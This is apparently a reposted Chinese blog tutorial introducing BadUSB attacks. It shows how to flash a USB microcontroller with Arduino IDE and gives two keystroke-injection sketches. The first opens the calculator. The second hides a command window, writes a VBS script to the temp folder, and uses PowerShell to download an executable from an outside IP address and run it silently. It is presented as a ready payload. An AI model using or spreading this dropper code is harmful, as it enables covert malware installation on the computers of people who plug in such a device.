1. 首页首页
  2. 科技前沿科技前沿

2025年IOT黑客入门篇之初探Badusb

科技前沿 阅读 64

IOT黑客入门篇之初探Badusb什么是 Badusb BadUSB 是一种使用带有恶意软件编程的 USB 设备的计算机安全攻击 例如 USB 闪存驱动器可以包含可编程的 Intel 8051 微控制器 该微控制器可以重新编程 将 USB 闪存驱动器变成恶意设备 BadUSB 攻击是在 2014 年由 Karsten Nohl Sascha Kri ler 和 Jakob

大家好,我是讯享网,很高兴认识大家。

什么是Badusb?

购买一个Badusb

1.x宝
在这里插入图片描述
讯享网
在这里插入图片描述

向Badusb写入恶意代码

安装烧录工具-Arduino

  Arduino是一款便捷灵活、方便上手的开源电子原型平台。其开发环境,主要包含两个主要的部分:硬件部分是可以用来做电路连接的Arduino电路板;另外一个则是Arduino IDE,你的计算机中的程序开发环境。你只要在IDE中编写程序代码,将程序上传到Arduino电路板后,程序便会告诉Arduino电路板要做些什么了

直接在官网下载
在这里插入图片描述
下载完成用管理员身份运行,让他自动安装依赖

注意:如果无法安装,可以手动下载到C:\Users\admin\AppData\Local\Arduino15\staging\libraries这个目录下面打开即可。
在这里插入图片描述
然后插入Badusb,Arduino IDE选择Badusb的端口以及对应型号
在这里插入图片描述
在这里插入图片描述
弹一个计算器

#include <Keyboard.h> void setup() { 
    Keyboard.begin(); delay(200); delay(100); Keyboard.press(KEY_LEFT_GUI); delay(100); Keyboard.press('r'); delay(50); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); delay(100); Keyboard.println("calc"); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); Keyboard.end(); } void loop() { 
   }

讯享网

先编译
在这里插入图片描述然后上传即可
在这里插入图片描述

其他payload

讯享网#include <Keyboard.h> void setup() { 
    Keyboard.begin();//开始键盘通讯 delay(300);//延时 Keyboard.press(KEY_LEFT_GUI);//win 键 delay(500); Keyboard.press('r');//r 键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\""); [//Keyboard.println](notion://keyboard.println/)("cmd"); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); delay(1000); Keyboard.println("ECHO dim OBJsHELL >%TEMP%/BAD.VBS"); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); Keyboard.println("ECHO SET OBJsHELL = WSCRIPT.CREATEoBJECT(\"WSCRIPT.SHELL\") >>%TEMP%/BAD.VBS"); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); Keyboard.println("ECHO IrETURN = OBJsHELL.rUN(\"CMD /C ECHO WGET -uRI [HTTP://](http://106.75.249.46:9033/cOOOLIS-MS.EXE)x.x.x.x/sss.exe -oUTfILE %TEMP%/sss.exe | POWERSHELL - && %TEMP%/sss.exe \", 0, true) >>%TEMP%/BAD.VBS"); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); delay(500); Keyboard.println("%temp%/bad.vbs"); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); delay(500); Keyboard.println("exit"); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end(); } void loop() { 
    // put your main code here, to run repeatedly: }

使用抖音扫一扫关注我,带你学习网安知识,渗透实战,红队技巧。
在这里插入图片描述

小讯
上一篇 2025-04-07 12:43
下一篇 2025-02-16 07:20

相关推荐

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容,请联系我们,一经查实,本站将立刻删除。
如需转载请保留出处:https://51itzy.com/kjqy/42852.html